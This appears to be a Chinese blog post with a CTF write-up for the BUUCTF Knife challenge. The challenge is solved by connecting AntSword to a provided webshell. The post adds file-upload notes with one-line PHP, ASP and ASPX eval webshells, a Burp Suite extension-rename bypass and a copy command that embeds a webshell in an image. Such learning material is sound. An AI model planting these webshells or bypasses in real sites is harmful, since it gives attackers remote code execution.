BUUCTF [极客大挑战 2019]Knife

最新推荐文章于 2023-01-17 14:48:03 发布
最新推荐文章于 2023-01-17 14:48:03 发布
阅读量610 收藏
点赞数 1
分类专栏: Web CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CrotZZ/article/details/118491851
版权
CTF 同时被 2 个专栏收录
18 篇文章 1 订阅
订阅专栏
Web
16 篇文章 0 订阅
订阅专栏

在这里插入图片描述
打开一看结合题目,就是连接一下菜刀蚁剑,菜刀没用过只有蚁剑,下面用蚁剑实现
在这里插入图片描述
设置好URL和链接密码
在这里插入图片描述
找到flag文件
在这里插入图片描述
打开后找到flag

文件上传漏洞

一句话木马:
php

<?php echo @eval($_POST['shell']);?>

Asp
<%execute(request(“value”))%>
Aspx
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%>

前端判断文件后缀名可以Burp Suite配置好Proxy -> Options,并在Proxy->Intercept->Intercept is on,浏览器设置代理为Options中的配置,先把shell.php后缀改为jpg,然后提交,再filename中把文件shell.jpg后缀改为shell.php

图片马
一般直接上传木马文件都会被过滤拦截,这时候就需要用到图片马。
所谓图片马,就是将一句话木马与图片相结合,使得图片中包含代码。
制作:
一个正常图片,一个木马文件,内容为php一句话木马,在命令框里
copy pic.jpg/b + php木马.php/a webshell.jpg生成图片马

维多利亚蜜汁鱼
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
大文件切割利器Knife
08-28
1. 可以精准、快速地切割/复原任何大文件,一个字节也不差。  本款大文件分割软件最大的特色是,对于大小超过4GB的所谓“巨型”文件,也可轻松、快速地分割/复原,只要你可用的存储空间足够。  2. 支持分割的...
BUUCTF Web [极客挑战 2019]Knife
热门推荐
wangyuxiang946的博客
10-28 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [极客挑战 2019]Knife一、题目简介二、思路分析1)一句话木马2)代码执行三、解题步骤1)目录遍历2)查看文件内容四、总结 一、题目简介 页面中的文字提示我们使用「菜刀」连接后门,什么!你没有菜刀?恭喜你,你来对地方了,网上大部分的答案都是直接上菜刀连后门,实际上不使用.
BUUCTF WEB [极客挑战 2019]Knife
Y1da的博客
04-16 209
BUUCTF WEB [极客挑战 2019]Knife 根据提示直接使用蚁剑连接 在文件根目录中找到flag文件,获得flag flag{b297ceda-a835-48bb-acf9-2a6c03f68d32}
BUUCTF [极客挑战 2019] Knife
Senimo
10-18 281
BUUCTF [极客挑战 2019] Knife 启动靶机,打开环境: 题目提示为菜刀,并且给出了一句话木马 直接使用中国蚁剑连接即可: flag在根目录下:
大文件切割器-knife
04-05
可以把任意类型的大文件分割成很多小文件,然后在另一个地方,把那些小文件还原成大文件,因为就是简单的分割与合并,所以理论上是兼容其他分割文件工具的。支持4G以上的大文件分割,针对多线程和大文件做了优化,...
Knife4File大文件分割
09-05
Knife4File大文件分割 nife for File 大文件切割器 ----------------------------------------------------------------------------------------------------- 1.可以精确切割/复原文件,巨型文件(>4GB)也可搞定,...
Knife4j官网(源代码)
02-21
Knife4j官网 一、官网 二、简介 三、快速开始(Spring Boot 2 + OpenAPI2) 四、Spring Boot 2 4.1 OpenAPI2 4.2 OpenAPI3 五、迭代计划 六、介绍 七、实战指南 7.1 Spring单体架构 7.1.1 基于Maven Bom方式使用 7.1.2...
Springboot使用Knife4j
03-16
Springboot使用Knife4j
BUUCTF】[极客挑战 2019]Knife Writeup
algae
08-23 385
flag{bbfff7f8-7c63-4dc2-bd28-64a75585d2cf}
CTF_EXP06:BUUCTF [极客挑战 2019] Knife
Senimo
10-18 497
CTF_EXP06:BUUCTF [极客挑战 2019] Knife 启动靶机,打开环境: 题目提示为菜刀,并且给出了一句话木马 直接使用中国蚁剑连接即可: flag在根目录下: 非常基础的一道题,首次使用Python尝试一句话木马连接 首先来看一句话木马结构: <?php @eval($_POST['attack']) ?> 使用POST传参方式,参数名为:attack 获取到参数后,将整个$_POST['attack']的内容替换为传入的值 @eval()把字符串当成PHP代码执
BUUCTF:[极客挑战 2019]Knife
末初的CSDN博客
10-20 622
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]Knife 蚁剑连接,根目录发现flag
CTF题 BUUCTF之[极客挑战 2019]Knife 1
weixin_44632787的博客
06-17 3063
CTF题 BUUCTF之[极客挑战 2019]Knife 1 启动我们的挑战项目 这里的题目简直就是在提示我们用中国菜刀连接,但是由于个人习惯这里我就用中国蚁剑来连接了。(其实中国蚁剑和中国菜刀的功能差不多,不过个人感觉蚁剑更好用一些吧)。 现在来打开我们的蚁剑工具 然后填上我们的连接和密码:Syc 然后进入到对方的登录后台 最后到这个后台的根目录下就可以找到flag值 如果你不能一下子就看出来是用蚁剑这些工具来连接,那可能是因为你做题的经验还不够。做多了自然而然就能想到了。总的来说,这题属于
CTF-Web-[极客挑战 2019]Knife
归子莫的博客
05-03 5588
CTF-Web-[极客挑战 2019]Knife 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]Knife 打开题目的实例 思路 看到这种题目,首先到处点一点,看...
BUUCTFKnife
金 帛的博客
04-06 749
BUUCTFWP
极客挑战 2019Knife
Lixunzhe0112的博客
01-17 132
看见了一句话木马,我们尝试直接用蚁剑连接一下。在根目录下找见flag文件,就拿到了flag。
[极客挑战 2019]Knife
朋克归零膏的博客
10-13 202
我比较喜欢菜刀里面的虚拟终端功能,linux的话大部分命令都能玩.不过也要看具体用户的权限.连上去.然后找flag,熟悉下来flag一般就放在。这题应该就是给大家熟悉一下菜刀用法,有。[极客挑战 2019]Knife
网关配置knife4j
最新发布
03-08
Knife4j是一款基于Swagger的API文档生成工具,它提供了一种简单、快速、美观的方式来生成和展示API文档。下面是关于网关配置Knife4j的介绍: 1. 配置依赖:在项目的pom.xml文件中添加Knife4j的依赖: ```xml ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值